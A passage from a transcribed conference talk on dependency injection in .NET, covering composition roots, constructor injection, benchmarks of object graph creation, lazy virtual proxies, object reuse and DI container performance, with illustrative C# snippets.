And that is not where you have most information available to you. You could actually wait and make that decision until your application is actually running because then you know a lot more about the context in which you're running. You might actually know, for example, if you're building a web application, you may know what the incoming request is, and you might actually make some sort of intelligent decision based on what that would be. And if you're running a small device application, you may look at what sort of processes do I have available, or MMR out of memory, or you can make all sorts of interesting decisions based on your environment if you wait. And if you do a bastard injection, you make the decision too early. So you just limit yourself. You constrain yourself, and you constrain the options that you have. So that's really not a good idea. So do defer the composition until the very end. So when do you need to compose your entire object graph, all of your controllers and dependencies and so on? When do you need to do that? So here's a very common application architecture that consists of application model, domain model, data access. So those are just three libraries. I'm not saying that you have to write your software application architecture like this, but often it's helpful to somehow separate it into different modules, different libraries. And the point here is that all of those libraries should just contain classes that use constructor injection. And none of those classes actually make any decision on how they're composed together and what the subtree that they might have, what that actually looks like. So they should not use bastard injection. They're just sitting there with all their incoming constructor arguments and waiting for some third party to compose them together. And that third party is the application route. So that's where you have your entry point entry application, where you really need to actually have this software up and running because there's a user who wants to use this software. That's where you can't really defer that decision any longer because now you actually need to execute the code. So you have that entry point. You compose your object graph, and then you call the root method on your object graph, and it goes to party and do whatever it is that it does. So it might be a controller that has some sort of controller action, and you call into that controller action, and it will then go and call all of its repositories or whatever that is. And you can have something similar happening on a desktop application or batch job or whatever that would be like. All right. So it means that you have to create or defer composition until the last possible moment, and then you have to create that big object graph up front. And I tend to, in my experience, it actually tends to have about the size that I showed you before with all the strange names, but that is actually a pretty typical size of the systems that I'm building anyway. But it might actually be larger. It might actually be something that actually has hundreds of nodes in that graph. So people are concerned. So how does this impact the startup time of my application? Isn't that bad to have to do everything up front, and then only when that graph has been constructed can you actually start using it? Isn't that bad for startup time? And isn't it bad for memory footprint? Because I'm creating a lot of objects, and I may not have to use all of those objects. So what about that? 
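The composition root idea, reduced to a self-contained sketch — all of the names here are placeholders, not taken from the talk:

    public interface IDependency
    {
        void DoWork();
    }

    public class ConcreteDependency : IDependency
    {
        public void DoWork() { /* the actual behaviour lives here */ }
    }

    public class Root
    {
        private readonly IDependency dependency;

        public Root(IDependency dependency)
        {
            this.dependency = dependency;
        }

        public void Run()
        {
            this.dependency.DoWork();
        }
    }

    public static class Program
    {
        public static void Main()
        {
            // Compose the whole graph in one place, at the entry point...
            var root = new Root(new ConcreteDependency());

            // ...and then call into the root of the graph and let it do its work.
            root.Run();
        }
    }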
And if you want to fall asleep now, just keep yourself awake for another 20 seconds, none of those are real concerns. Well, they are real concerns, but you should not have them because they're not relevant. And in the next 50 minutes, I'm going to tell you why. But if you take nothing else with you today, just know this. This is not a problem at all. Go and worry about something else. Or have a happy life, if you will. All right, so this all hinges on this one rule, though. So, first rule of constructor injection — and no, I'm not going to say that you're not allowed to talk about constructor injection. So the first rule of constructor injection is actually a pretty sensible rule. The rule is: constructors should not do any work. And I think this is actually a pretty good rule overall in application design because if your constructor actually does significant work, you do work in a very implicit manner. And that can be very surprising for the clients that actually call into the code that you're writing. So I think this is just, in general, a very good rule of API design that constructors are for initializing classes, but they're not really supposed to do any real work. So we only do assignment. So as you can see in this little code snippet down on the bottom of the screen, I have this A1 class that apparently seems to take A2 and C1, two INode implementations, as input. And the only thing that we actually do is we just assign those incoming constructor arguments to fields, and then we just save those fields for later on. And then we could have more members on this class that actually go and use those fields afterwards. So that's actually the only thing a constructor is allowed to do. And then you go, what about guard clauses? So what if someone actually tries to pass in null as A2, for example? Can't we do a guard clause? Isn't that work? Well, in my opinion, a guard clause against null is not work. It's a patch on a deficiency of the framework. So the framework has this design deficiency. And I actually had the opportunity to talk to Anders Hejlsberg about that in a roundtable. And he said, yeah, well, the biggest mistake he made on the .NET framework at all was that he did not design a non-nullable reference type. So there is no way you can say in the .NET framework today that I have an interface, but it cannot be null. That is just not possible. And he said, it's impossible to retrofit into the .NET framework today because it would incur too many breaking changes. But as we all know, null is probably the biggest design mistake made in software overall. The original designer of null recently came out, I don't know if you saw that. He recently came out and said, this is probably a design mistake he made back in the 70s that has cost billions of dollars overall throughout the years. How many times do you get null reference exceptions? Some of you actually are going, yeah, well, I get them all the time too. They're just a pain in the ass. So it's OK to do a null guard check here because it just patches your deficient framework. Java is the same, so we don't have to feel bad about that. But anyway, so that's the only thing we can do. So if you accept this rule, everything else that I'm going to tell you today holds true, there is nothing to worry about. What you have here is .NET — or Java, for that matter, it also goes for that. Those are essentially object-oriented frameworks.
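Reconstructed from that narration, the snippet on the slide is presumably close to this — the INode interface is only a stand-in here, since its real member is shown a bit later in the talk:

    using System;

    public interface INode { } // stand-in; the actual member appears later

    public class A1 : INode
    {
        private readonly INode a2;
        private readonly INode c1;

        public A1(INode a2, INode c1)
        {
            // Guard clauses: not "work", just a patch for the framework's
            // lack of non-nullable reference types.
            if (a2 == null)
                throw new ArgumentNullException("a2");
            if (c1 == null)
                throw new ArgumentNullException("c1");

            // The only thing the constructor really does: assignment.
            this.a2 = a2;
            this.c1 = c1;
        }

        // Other members use this.a2 and this.c1 later on.
    }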
If there's something that they're optimized to do is to create objects, you know, if we had an object-oriented framework that couldn't create objects very fast, it wouldn't be a very good framework or very good runtime. So it's actually, you know, creating objects is just very, very fast, so nothing to worry about. But let's have a look at why there's nothing to worry about. So if we have this rule, though, when is construction ever going to be slow? And I'm actually having a hard time coming up with a good answer to this. I mean, if you don't do any work, so you're not allowed to do a tight loop inside of your constructor because so you can't come up with those kinds of contrived examples. If you don't do any work, if you don't only do assignment, when is construction ever going to be slow? The only answer that can really come up with is if you have a very big assembly and the first time you actually need to load that assembly, it might actually take some time. So you could put, you know, all sorts of binary files and maybe even videos and so on as embedded resources into assembly, and that would actually make that assembly pretty big. And that would actually take a little bit of time to read that assembly from disk and actually do JIT compilation. So that might actually make construction slow because the first time you try to create an instance of a class that's defined within that assembly, it needs to load that assembly. That is the only example that I can really come up with. So it's sort of a semi-exotic corner case already, but it might happen. So let's have a look and see, you know, what would actually happen if we had that sort of scenario. I'll look at that at the moment. So there's all other things like JIT compilation and garbage collection and so on, but that generally just applies with the.NET framework overall. It doesn't really matter whether you're writing loosely a couple code or not. Right. All right. So what I'm going to do next now is just to write instances of this graph here. So I decided to keep it very real and, you know, something that you could really relate to. So I decided to call the nodes a1, a2, and a3, and b1, b2, and b3, and so on. Now I actually decided, I actually thought, well, do I have to make this something that you could relate to, like calling one thing a controller and then a repository and a log and so on. And I thought, you know, what I'm trying to say would probably drown out and now you're actually trying to understand what the application is doing, if you will. So I just wanted to keep it abstract like this because I hope you can map this in your mind and think about what your specific object graphs will look like. So you can imagine that everyone, all the nodes call something with a, resides in an a assembly and all the nodes that calls b is residing in a b assembly. And then we have this c assembly and I've made it red because this is the node that will play the role of the difficult node in the various things that I'm going to do next. So we could, for example, in a couple of minutes, I will let c1 play that role of the node that resides in a big assembly. And we can use c1 as the problematic node, if we will, do various sorts of experiments with it. So I'm going to switch over to Visual Studio now. And what I'm going to do is I'm going to write some tests and I will do a benchmark test first. I'll walk you through why this thing looks like this. So gets tightly coupled equivalent. So the first thing I want to do is just a benchmark. 
So actually before I start creating the graphs, I will just create the equivalent of that graph but written in tightly coupled code. And I'll walk you through that and I'll speed up as I go along. But I go a little bit slow in the beginning so that you can actually understand what's going on and then I'll go faster and faster. Yes, you have a question. Can I increase the size of the font? Yes, I can. We're actually on size 12 already. But let's do, no. Now I don't want to increase just this one. I want to do it overall because otherwise I have to remember to do it. So why is it saying statement completion though? Let's do it a third time around. So let's see, what do I need to do here. Text editor. There we go. So 14. Better? No one is complaining. All right. One person is saying yes, no one is complaining. That means an overwhelming majority thinks this is really, really good. All right, so every test that I'm going to write here will always have this structure where I say GetTestResults and then I pass in this code block. And the reason why I do that is because that overall test method called GetTestResults actually runs that code block, I think, a thousand times in a tight iteration and then it measures how long it takes and averages over that. So that's one way to do some sort of pseudo performance measuring out of it. So I'll just do a new tightly coupled A1 and let that be my INode. So there's no graph at the moment. I'll show you the code in a minute. But what you could imagine that I'm doing here is that I am creating an instance of A1 and instead of creating the big object graph up front, I'm just creating that A1 and then as I call into A1, I will create my new nodes in a tightly coupled way as I go along and call into those things. So I will do the equivalent work of this graph, but I will just do it in a tightly coupled manner just to do the benchmark. So this whole INode thing here is just to make it simple. I'm using the same interface all the way through the graph, but you could actually have a graph that consists of different heterogeneous interfaces if you wanted to do that. But I'm just having this INode and the only purpose of this INode interface is to measure itself. So it's very, very meta. So it has this single method called GetUsedInstances and this context here is something that can optionally be used to change the behavior of the system, if you will. But it just returns an IEnumerable of INode objects, and the only thing it actually does is return all the objects that were used in calling into that method. So the only purpose of this method's existence is to measure itself. Kind of meta, but it kind of gives us a pretty good idea of what's going on. So the tightly coupled version of that, what it actually does is it just creates a new tightly coupled A2, so the equivalent of the A2 node, and calls the method of that A2 node, and it also on the spot creates a new instance of tightly coupled C1, which is the equivalent of the C1 node. So that red node there. So it's creating the first two sub nodes, if you will, on the spot, concatenating all the results together, concatenating the results with itself because that's the protocol of this thing. This is what actually enables us to measure all the objects that are being created and then returns all of that stuff. And it does that recursively all the way through. Well, not recursively, but down through this graph equivalent, if you will. So let's see what that looks like. So this is just our benchmark. Let's see.
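Based on that description, the measuring interface and the tightly coupled benchmark classes are probably roughly like this — an approximation, with TightlyCoupledA2 and TightlyCoupledC1 following the same pattern further down the graph:

    using System.Collections.Generic;
    using System.Linq;

    // The whole point of the interface is to measure itself: each node returns
    // every object that was used while servicing the call.
    public interface INode
    {
        IEnumerable<INode> GetUsedInstances(string context);
    }

    public class TightlyCoupledA1 : INode
    {
        public IEnumerable<INode> GetUsedInstances(string context)
        {
            // Create the children on the spot, call into them right away,
            // and concatenate their results with this instance itself.
            return new TightlyCoupledA2().GetUsedInstances(context)
                .Concat(new TightlyCoupledC1().GetUsedInstances(context))
                .Concat(new INode[] { this });
        }
    }

    public class TightlyCoupledA3 : INode
    {
        public IEnumerable<INode> GetUsedInstances(string context)
        {
            // A leaf node just reports itself.
            yield return this;
        }
    }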
There we have it. So I have this little test framework here and I'll just refresh the test list, run the test. And as you can tell, as we expected tightly coupled code to be very, very fast. It takes on average 24 ticks. That is 0.0024 millisecond. That is a duration that I cannot really understand in my head. It is very, very fast. And we would expect tightly coupled code to be very, very fast on our object oriented framework. It seems like all our prejudices are still intact. Good. We also see that on average we have seven objects created which fits pretty well because we are expecting somehow seven objects to be involved in this operation. So that's just the benchmark. So let's do the, instead of creating those things on the fly and calling into them, let's actually create the graph first and then call into it afterwards. So that's what this thing about deferring composition is all about. So I'll do the next test and I'll say get playing graph because I'm going to do much more complicated graphs in a minute. And basically the first time here I'm going to walk you through it and then I'll do copy and pasting so it'll speed up the things a little bit. But I'll need a new instance of A1. And as you can tell from IntelliSense, if you can see this, it actually needs an instance of A2. So I'll do a new A2 and I'll look at that. It needs a new B1. I'll do one of those. It needs a new B2. Whoops. And that has a default constructors and I can close this. I can close this. Let's see, B2 also needs an A3. So I'll go back here and create an A3 which has a default constructors. Now I can close this one off. And then I need the C1 node. That requires the B3 node. So that's the object graph. And I'll just copy and paste for now on so you don't have to watch me type this all the time. But I thought the first time was probably a good exercise just to walk you through that. So let's have a look and see what that actually looks like. It's a little bit slower. Actually sometimes I see that it's a little bit faster. But we're looking at 34 ticks at the moment. Sometimes it's just jit compilation that actually makes it slower. So now you can see it's actually down in 19 ticks. So I'm not claiming that constructor injection or big object graph upfront like this is actually either slower or faster. It's just about the same speed. So now you could argue that this is sort of, it doesn't really tell us a lot because what I'm doing at the moment is I'm creating seven objects and then I'm calling a method, a single method on all of those seven objects. And I'm just doing it in two different sequences because in the first example I am doing create an object, call a method on it, create an object, call a method on it. And then in the second example here I'm just creating all the objects first and then I'm calling all the methods on it. But I'm doing it in a tight loop and I'm not waiting at all. So we should really expect this to take just about the same time anyway because we're using all of the nodes right away. So it doesn't tell us a lot. But let's have a look at that scenario then where we have this C1 node that's somehow problematic. So let's start looking at what is that C1 node actually recites and then simply that is big so it takes some time to actually load that node. And let's see what's going to happen because now we will start to see the differences. So I'll go into my nodes. So these are all my nodes. And I'll do a copy of the C1 node because I'm going to need the old C1 node again later on. 
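The graph being constructed in that test, written out in one expression, is roughly the following — one plausible reading of the narration, since the exact constructor shapes are hard to make out from the audio:

    // In the talk this expression sits inside the GetTestResults(...) harness;
    // the node classes mirror the diagram: A1 -> A2, C1; A2 -> B1, B2; B2 -> A3; C1 -> B3.
    INode graph =
        new A1(
            new A2(
                new B1(),
                new B2(
                    new A3())),
            new C1(
                new B3()));

    var usedInstances = graph.GetUsedInstances(null);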
So I'll just do a copy of that one. I'll rename that to slow C1. So how can we simulate that this takes a long time to load? So it's only going to take a long time to load the first time when it's loading into the app domain because after that it's in the app domain and it's being jit-compiled and so on. So all the subsequent accesses you have to this object that recites in this problematic assembly, that problem goes away after you paid the price. So the way that we can simulate this is by creating a static constructor. So I'll just create a static constructor. That constructor is a constructor that only runs once per lifetime of the app domain. So we can simulate that it's slow to load by just doing a thread.sleep. And let's just say it takes a second to actually load this particular assembly. So let me switch back here and I'll say, well, instead of getting a plain graph, let's get a graph that uses this slow C1. Get graph using slow C1. And obviously I need to go down here and say, well, let's have a look at what's happening when I go slow C1. Let's have a look at that. So we will expect this to be kind of slow and that's exactly what we are seeing. But I think there's an interesting lesson to be learned here because we see that the mean duration is not anywhere near a second. The mean duration here is 0.2 milliseconds and that's probably not that difficult to understand because we're only paying the price of loading this assembly into the app domain once and after that it's just as fast as all the other things. So the price of actually having this thing happening is averaged out over time. So I think there's an interesting thing to be learned here because it might actually seem a little bit counterintuitive before you start thinking about it. And I have to digress a little bit here but I think there's mainly two, I think you divide most applications into two main groups. There's one application group that is basically your web application. So everything that takes in requests from the outside, what is typical about those types of application is that they handle an incoming request and you want to do that as fast as possible and then return the result of that request and then you are done with that. So you basically normally create a graph per request, that's the normal thing, you tend to handle that sort of scenario. So that's your web applications, that's your web services, that's your messaging based application. They typically tend to handle to work in that way and they may have lots of concurrent requests that they need to handle. So you create lots of object graphs all the time and you know, let all of those object graphs go out of scope all the time. And then you have that other type of application here which is, you know, a couple of years ago that would be your desktop application, something that you start up and you run it maybe for hours, maybe even for days. Nowadays, it might also be your mobile device application. Those are very different because you pretty much just load whatever objects you need to actually work this application and then they stay in memory for a long time. So you would probably expect, well before I started thinking about this, I would actually think that this thing about load time would be mostly problematic over in my web scenario but it turns out that on average this thing just disappears in the web scenario because well the first request that comes into a web server that has this problem will obviously pay the price. 
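For reference, the slow-loading node simulated in that demo is presumably just this — with the caveat that Thread.Sleep in a static constructor only mimics a slow assembly load, it isn't the real thing:

    using System.Collections.Generic;
    using System.Linq;
    using System.Threading;

    public class SlowC1 : INode
    {
        // A static constructor runs once per app domain, so the one-second
        // penalty is only paid the first time the type is touched.
        static SlowC1()
        {
            Thread.Sleep(1000);
        }

        private readonly INode b3;

        public SlowC1(INode b3)
        {
            this.b3 = b3;
        }

        public IEnumerable<INode> GetUsedInstances(string context)
        {
            return this.b3.GetUsedInstances(context).Concat(new INode[] { this });
        }
    }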
But we know that in .NET at least we have this problem even though we're not doing big object graphs up front: the first request that hits a brand new website that's just, you know, been released on IIS will pay the price of doing all the JIT compilation and so on. So that's why we typically tend to do some sort of preheating when we work with .NET web applications. So I would just state now that this problem about loading those big object graphs up front, even though you have components that are very slow to load, is just not an issue when you're dealing with web-based applications or request-based applications because it just averages out over time and then after that you don't really have a problem. So now you're on this other side where you say, well what if I'm building a device application or desktop application? I want startup time to be fast because otherwise my users are going to hate me. Fair enough? So we have to think about there are certain things where there are certain prices we have to pay simply to start an application like this and no matter what we do we just have to pay those prices whether we're writing loosely coupled code or whether we're writing tightly coupled code. But if you have this assembly which might be problematic because it loads too slowly then you have to ask yourself whether that actually impacts your design decisions or whether you want to write loosely coupled code or tightly coupled code. So again if you have this scenario where you need to call into that node right away, so imagine that you have this C1 node again, so that red node, and you're starting a desktop application or, you know, mobile device application and the first thing you need to do when that application actually starts up is to call into that node because that contains important functionality. There's really nothing you can do about that. Now you're having a different sort of problem but it's not a problem related to your decision on whether you're building, you know, tightly coupled code or loosely coupled code. That's just a different type of problem. So the only scenario where this actually becomes problematic is when you have a very specific combination of circumstances. So you need to be doing, you know, a desktop or small device application. You need to have one of those assemblies that are extraordinarily slow in their load time and you need to have a scenario where you don't actually need to call into this thing right away. If you have that specific sort of exotic combination then you might actually have a concern. So let's have a look at what that would actually look like and why you might want to be concerned. So I'll go back and I'll say well right now I am unconditionally using slow C1 because that is what A1 does at the moment. So my current implementation of A1 just calls both A2 and C1 unconditionally. So that's the scenario I have at the moment. But what if I have another version of A1 that might not always call into C1? What would that look like? So I'll do a copy of my A1 class. Let's put it here. And I will call it conditional A1. So if you were at my talk this Wednesday you would have seen me doing other things called conditional. This is a little bit of a special case because I'm not going to pass in specifications and so on. But basically what it's going to do is it's going to look at this context. So this context is sort of like just a weakly typed control structure if you will.
So in this case I'll just look and see whether it says use C1 and if that is the case I'm just going to return the result of calling into the object graph as usual. So in this case I'm calling into the A2 node and I'm calling into the C1 node just like I did before. So that is the same scenario as before. But if that control structure is not use C1, if that string is not use C1, I'll just skip using that C1 thing. So I still want to use A2 and I still want to concatenate myself because that's the protocol of the interface. And I'm just not creating that, I'm just not using that C1 node at all. So let's have a look at that. So now we're actually in a scenario where we're conditional. And first of all I just want to do a little sanity check so I'll just take that test that I have before and I say get graph, so I'll say conditionally, conditionally, using slow C1. And I need to pass in that specific string here. So I'll just do that and I'll just do a copy-paste to make absolutely certain that it actually works. So this should be the exact same scenario as before. So this is just my sanity check where I'd expect to see the same performance profile as before. And it looks like it's just about the same. So that fits, I have reproduced the same scenario as before. So nothing has really changed there. So let me go back and do another one. So let's call this not using slow C1. So obviously I would say don't use C1 down here. So let's go back and have a look at what that looks like. And it's just as slow as before. I should actually say, I forgot to use the conditional. Oh, thank you. So actually both of these are actually wrong. Good catch. Thank you. So let's do conditional. Let's do it again. All right. And we'll do that with the other one. All right. So let's first do the first one again. So that is just my sanity check to see whether I actually did the same thing. And it just clocks out just like it was before. And then I am trying not using this slow C1. And that actually is very fast. Am I doing something wrong here? Slow C1. Oh, that's because I actually need to. Now it's actually been loaded into the app domain. So I'm just doing a, let's do a rebuild here. All right. So let's try it again. All right. OK. So forget the last one. That was just, it was just cached. But the problem is what we see now is that we are actually still paying the time, although we are not using the object because you can see before when I wanted to use that slow C1 node, we used all seven nodes. But now I'm actually saying I don't want to use that node or that sub node. So I don't want to use C1 and B3. So I only want to use the other five nodes. And that is actually also what's happening. The problem is that we are still paying the price. So this is why I could understand why people are concerned about creating those big object graphs up front. Because you're saying, why should I pay the price if I don't want to call into it right away? Surely tightly coupled code must be better because if I do tightly coupled code, I could actually wait until I get into that method call. And then I can have a look at that context and make a decision on whether I want to create that node or not. But we have a trick. And that trick is just about almost 20 years old now. So there's this book called Design Patterns. You've probably heard about it by the Gang of Four. It's from 1994. And it describes a pattern called proxy.
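A sketch of what that conditional variation might look like, reusing the assumed INode interface from before (the exact control string is taken from the narration, everything else is an assumption):

```csharp
using System.Collections.Generic;
using System.Linq;

public class ConditionalA1 : INode
{
    private readonly INode a2;
    private readonly INode c1;

    public ConditionalA1(INode a2, INode c1)
    {
        this.a2 = a2;
        this.c1 = c1;
    }

    public IEnumerable<INode> GetUsedInstances(string context)
    {
        // The context string acts as a weakly typed control structure:
        // only when it says "use C1" is that branch actually invoked.
        if (context == "use C1")
            return this.a2.GetUsedInstances(context)
                .Concat(this.c1.GetUsedInstances(context))
                .Concat(new INode[] { this });

        return this.a2.GetUsedInstances(context).Concat(new INode[] { this });
    }
}
```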
And normally when we think about proxy, we think about something that involves doing some sort of remote object call over a network, like something where there's a remoting object or a web service on the other end. But there's a variation described in the book that is called virtual proxy. And the description of a virtual proxy is that it's an implementation of an interface that wraps around an expensive implementation of that interface, so it looks like it's the expensive thing, but it actually defers the creation of that expensive resource until you actually need it. And then it starts delegating to it. So that sounds just like what we need. So let's create a virtual proxy. And the virtual proxy sounds like a sort of a scary thing. I mean, it sounds like you need all sorts of various magic things. So let's call it something else. So let's call it lazy C1, because basically if you ever used an ORM, you know, an object-relational mapper, like NHibernate or Entity Framework, you probably have seen this thing like lazy initialization. And that is basically the same thing. So let's call it lazy C1. I could actually just have called it LazyNode. Let's call it lazy C1. And what I want to do is I want to take a dependency on a Lazy<T>, or more specifically a Lazy<INode>. So if you know Lazy<T>, that is just a base class library class that does lazy initialization. So let's call that lazy node. All right. So now we have a lazy node. So basically we can implement this by returning the value of calling into this lazy node. And then when I dot into Value, or when the code actually tries to read Value, that's where you have lazy initialization. So that's where the object is actually going to be created. And the Value is an instance of INode. So now I can call GetUsedInstances on that, passing in the context. And then again, concatenating myself just to, you know, make the measurements correct in the sense that now we're also counting this specific lazy node. So I can go back and take a copy of my current test, paste it in here. And I can say, I need to wrap this sub node, so the C1 and B3 sub node, I need to wrap that with that virtual proxy or that lazy C1 node. So I will just go there and say, well, let's have a new lazy C1. And the constructor of that takes a Lazy<INode>. So let's do a new Lazy<INode>. The constructor of Lazy<INode> has different overloads. One of the overloads allows me to pass in a Func<INode>. So I'll just put that arrow in here, and I'll need to close this a couple of times. And I'll actually just decorate this thing. Ah, I need to. So let's call that lazy slow C1. All right. So let's go back and see whether that actually helps us. All right. So we're back at nine ticks and five objects. So instead of having to change my architecture or, you know, revert back to tightly coupled code because it looks like I have a problem, I can actually just make a decision at a very late time in my project lifetime and say, well, it seems like this is actually problematic. So I will change my mind about how to compose this object graph, and I will just slide in that extra node into the tree, and then, you know, because I kept my options open, I was now able to deal with this problem. So just to do a sanity check here, let's just see if it still works if we actually want to use it. So let's have one that says using that thing. And I'll just do this. Oops.
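A sketch of that virtual proxy and how it might be slid into the graph; the names follow the narration but are still assumptions:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

public class LazyC1 : INode
{
    private readonly Lazy<INode> lazyNode;

    public LazyC1(Lazy<INode> lazyNode)
    {
        this.lazyNode = lazyNode;
    }

    public IEnumerable<INode> GetUsedInstances(string context)
    {
        // Reading .Value is what triggers creation of the expensive node,
        // so its price is only paid if this branch is actually used.
        return this.lazyNode.Value.GetUsedInstances(context)
            .Concat(new INode[] { this });
    }
}
```

Wrapping the slow branch when composing the graph then looks roughly like this:

```csharp
INode graph =
    new ConditionalA1(
        new A2(new B1(), new B2(new A3())),
        new LazyC1(new Lazy<INode>(() => new SlowC1(new B3()))));
```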
And now we should, now we're actually using the C1 node again. So now we would imagine or we should expect it to be just as slow as before because we have to pay the price. And you will see that is also the case. And you also see that now we have eight objects instead of just seven before. So in this case where we actually need that slow C1 node, we're actually paying that very, very small price of adding an extra object because that is that lazy C1 node that I added here. But as we've seen, you know, creating objects in general is very, very fast. So I think, you know, this is a price that is almost nonexistent. All right. So just to recap so far, this whole idea about being worried about composition time is really not something that you need to be worried about because even if you have this very special combination of circumstances where you're building a desktop app or a mobile device app and you have this sort of assembly that's very, very big and it's going to take time to load and you don't need it right away, you can still get around that sort of issue by using this virtual proxy or that lazy initialization pattern here and deal with objects composition time. So in general, this is just something that is very, very fast. So it's not really a problem. So there's the other concern. And the other concern is this concern about memory footprint or object footprint, if you will. So if you look at the graph again, now let's imagine, let's reset everything. So let's imagine that C1 is not in an assembly that's, you know, very big and so on. So it's not that it's problematic or it takes time to actually create it. But let's imagine that we have another problem. So imagine that we're having now a web application or some sort of request-based application and that the typical scenario involves that we're calling into A2 all the time. And that is actually our main way through the application. But just once in a while, we need to call into C1. Not that often, but just once in a while. It might be some sort of semi-extraordinary circumstances that requires us to invoke the C1 node once in a while. So you could say, well, we could use this virtual proxy again to deal with that. But in general, you could just say, well, why should I create that C1 node and that B3 node every time if I'm only going to use it for one out of 100 requests? Because that might actually add to my memory footprint. And I'm not really using those nodes at all. So why should I have to do this upfront? I think that's a pretty good question. Why would you need to create those nodes all the time? Why are you actually creating all of those nodes all the time? Well, right now, I've just been creating all of those nodes all the time because I want to measure how fast it is. But in general, if you have incoming requests in your system, why are you creating the object graph from scratch every time? There might be good reasons for that, but it's not always necessary to do that. So let's do something else. So let's go back to the original plain graph that I had and have a look at what we could do with that. So what if we say that C1 node is actually problematic or not problematic, but we don't want to use that every time. So we don't want to create it every time. So why don't we just reuse them? Let's do call it reusing. So instead of creating new C1 and its child B3 every time, let me just cut that here. Let's say var C1 and just put it here, and I'll just put it back here. 
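A rough sketch of that change inside the measuring loop, reusing the earlier graph shape (the loop itself is my own illustration of "per request" composition):

```csharp
// The C1 branch is created once and shared across every composed graph.
var sharedC1 = new C1(new B3());

for (int i = 0; i < 1000; i++)
{
    // Only the five request-specific nodes are created per iteration;
    // the two nodes in the shared branch are reused every time.
    var graph = new A1(
        new A2(new B1(), new B2(new A3())),
        sharedC1);

    graph.GetUsedInstances("context");
}
```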
So now I'm reusing the C1 node in all the different requests that comes in. What happens then? So it still takes about the same time, in this case 39 ticks. But as you will see on average now, I'm only using five objects. And I'm not in this conditional scenario at the moment. Now I'm actually in this scenario where I'm calling into all of them. But even though I'm actually calling into all of them, I'm only using five objects. How could that be? Well it's actually not five objects. It's actually 5.000 something. But it just turns out that those two objects are being reused across thousands of different requests. So on average, you just don't see that because it's the same object all the time. So this is also known as the singleton lifetime style pattern in dependency injection pattern language. And you shouldn't confuse that with the singleton design pattern. They're slightly different, but they have the same effect. So we're actually reusing that node. Then you could ask yourself, why am I not doing this all the time? And that is actually a pretty good question. But there is one good reason for not doing this all the time. And that is especially if you have some sort of web-based application where you have concurrent requests. So what happens is you have lots of requests arriving at the same time. And they will then act upon this object graph from concurrent threads. So if you want to reuse those objects across different threads, they need to be thread safe. And not all classes in the base class library are actually thread safe. So you need to be aware of which subparts of your graph are actually going to be thread safe. But everything that you have where the entire subgraph is thread safe, you could just as well just reuse that and say, well, there's going to be one instance of that object for the entire lifetime of that application. And we're just going to reuse those over and over again. That's just going to be much more efficient. And then you're thinking, well, writing thread safe code is actually hard. And I would actually say writing thread safe code is very, very easy if you just write your services as immutable objects. And it's actually not that hard because services tend to be mostly about behavior anyway. So they tend to not have a lot of changing state anyway. So lots of services can actually be written as immutable implementations. And that will automatically make them thread safe. So if you'd noticed here in this conference, there's been this focus on functional programming. One of the things functional programming gives you is it has this emphasis on immutable data and immutable behavior. So that's just another reason why functional programming is very, very interesting because it actually allows you to reuse those things over and over again. All right. So I have a little time left. So let's have a look at something else. But before I do that, let's just recap that. So memory footprint will typically also not tend to be a problem even though you do big object graphs up front because you can just reuse all your objects. And if you can't reuse any of your objects, you should probably take a good look of whether you actually chose the correct implementation for your dependencies. All right. So I actually think that there's really nothing to worry about. 
Then there's a little extra worry that some people actually come with because then they say, well, that is all fine because up until now, the only thing I've shown you is something that involves lots of uses of the new keyword. But dependency injection, isn't that something about DI containers, dependency injection containers? And lots of people like to use DI containers. And I think DI containers have a good use case. I don't use them always, but I use them often. But then you've heard that DI containers work by reflection. So they use reflection to actually create object graphs. And you may have heard that reflection is very, very slow. So is that not then a cause of concern? If we use dependency injection containers, isn't this going to be slow then? So let's have a look and see whether it's going to be slow. So I will do a new test. This is the second to last test that I'm going to write. Let's do get graph resolved, let's say, composed by... So I'll use something called Castle Windsor, but it could pretty much have been any DI container. So I'll create a new instance of container. That's got to be a new Windsor container. And I'll just need to configure that thing. So I'll install something called the graphs installer into it. This is just... I've just packaged away all the configuration of the container that knows how to create this node. So that's not really very interesting. So I could have used Autofac, Ninject or whatever else, and the result would pretty much have been the same. So I'll do container.Resolve. And I will resolve the INode. And I'll just see what happens then. All right, so let's run this one. 125 ticks. It's slower than just creating an object graph with plain new keywords. If I do it one more time, you will actually see now we're down to 66. So part of that measurement, the first measurement, is actually because of JIT compilation. So it is slower than creating object graphs just with a new keyword, but it's not even 10 times as slow. It's maybe eight or nine times or maybe five times as slow as using the new keyword. But that's about it. And this is because even though reflection tends to be kind of slow compared to using the new keyword, these containers have lots of optimization built into them. So when they've seen a request one time, they actually know what it is that they're looking for, and they actually do all sorts of optimization techniques where they can remember what you asked for before, so they don't have to do the same work over and over again. So they're actually pretty well optimized. So it's a little bit slower, but it's not orders of magnitude slower at all. It's maybe eight or nine times as slow as it looks right here anyway. And I just want to put this into perspective then because we're looking at things that are sub, sub, sub millisecond at the moment, it's really, really hard to actually relate to these numbers. So let's just do something that is more normal. So the last thing that I'm going to do is I will create a new node. I wonder if this actually compiles. Where's the last curly bracket? Well, it does compile. I wonder where that went. Hmm. Ah. Well, anyway, let's see what happens. I want to see if this compiles. Okay, this compiles. So what I'm doing here is now let's actually do some work. So so far we've just been counting stuff and not really been doing anything. So now I want to introduce this thing called the database reading C1. So again, C1 node is the problematic node.
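A sketch of resolving the graph from Castle Windsor, as described above. The graphs installer is the speaker's own packaged-away configuration; registering the whole graph with a single factory method is just one minimal way it could be done, not necessarily what the speaker's installer actually does:

```csharp
using Castle.MicroKernel.Registration;
using Castle.MicroKernel.SubSystems.Configuration;
using Castle.Windsor;

public class GraphsInstaller : IWindsorInstaller
{
    public void Install(IWindsorContainer container, IConfigurationStore store)
    {
        // Minimal assumed registration: the container knows how to build
        // the INode graph shown earlier.
        container.Register(
            Component.For<INode>().UsingFactoryMethod(() =>
                new A1(
                    new A2(new B1(), new B2(new A3())),
                    new C1(new B3()))));
    }
}

// Usage in the benchmark test:
var container = new WindsorContainer();
container.Install(new GraphsInstaller());
INode graph = container.Resolve<INode>();
graph.GetUsedInstances("context");
```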
